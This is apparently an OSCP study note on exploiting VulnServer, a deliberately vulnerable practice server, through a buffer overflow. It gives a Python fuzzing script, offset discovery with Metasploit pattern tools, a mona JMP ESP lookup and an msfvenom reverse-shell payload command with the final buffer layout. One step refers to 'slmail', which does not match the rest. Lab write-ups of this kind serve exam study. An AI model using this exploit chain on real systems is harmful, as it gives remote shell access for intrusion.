OSCP
Search…
VulnServer
vulnserver

!/usr/bin/python

import socket import os import sys
host="ip" port=9999
buffer = "TRUN /.:/" + "A" * 5050
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) expl.connect((host, port)) expl.send(buffer) expl.close()
1
Run the slmail server in the windows machine -> fuzz the application to crash -> we found it crashed in 5050 bytes -> then we need to check the offset -> actual value ->
2
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 5050 -> create a pattern -> then run the code in to python -> then we found the EIp value -> 386F4337 -> now need to check the offset -> /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 386F4337 -> pattern value we got 2003 -> now run the code with this offset code and check the application is crashed or not -> after crashing we need to check the bad character -> remove the bad character -> ESP Follow dump -> after got bad character -> we need jmp esp value -> we will use mona module for this -> !mona modules -> check the DEP and ASLR False -> then pick this otherwise use mona command -> !mona find -s "\xff\xe4" -m essfunc.dll -> pick 1st one and reverse it ->77131EFD # Address retrieved from Mona results -> \xFD\x1E\x13\x77 # How it looks in your final exploit -> now create a shell code -> msfvenom -a x86 -platform Windows -p windows/shell_reverse_tcp LHOST=192.168.44.144 LPORT=4444 -e x86/shikata_ga_nai -b ‘\x00’ -f python -> add shell code in to python code and maintain the buffere value -> buffer = "TRUN /.:/" + "A" * 2003 + "\xFD\x1E\x13\x77" + "C" * 16 + buf -> run it -> boom
Copied!
Last modified 1yr ago
Copy link